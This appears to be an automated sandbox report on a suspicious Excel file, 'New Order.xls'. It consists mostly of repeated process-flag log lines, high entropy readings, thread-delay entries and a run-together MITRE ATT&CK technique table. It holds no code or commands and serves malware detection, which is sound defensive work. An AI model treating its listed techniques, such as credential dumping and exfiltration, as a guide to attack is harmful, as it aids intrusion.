Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: New Order.xlsStream path 'MBD0022EEA7/Package' entropy: 7.99272020732 (max. 8.0)
Source: New Order.xlsStream path 'Workbook' entropy: 7.998238688 (max. 8.0)
Source: ~DF88353551C6CABD09.TMP.0.drStream path 'Package' entropy: 7.99528162573 (max. 8.0)
Source: A0040000.0.drStream path 'MBD0022EEA7/Package' entropy: 7.99528162573 (max. 8.0)
Source: A0040000.0.drStream path 'Workbook' entropy: 7.99816642463 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 780Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts3
Exploitation for Client Execution		1
Browser Extensions		1
Process Injection		3
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting		Boot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.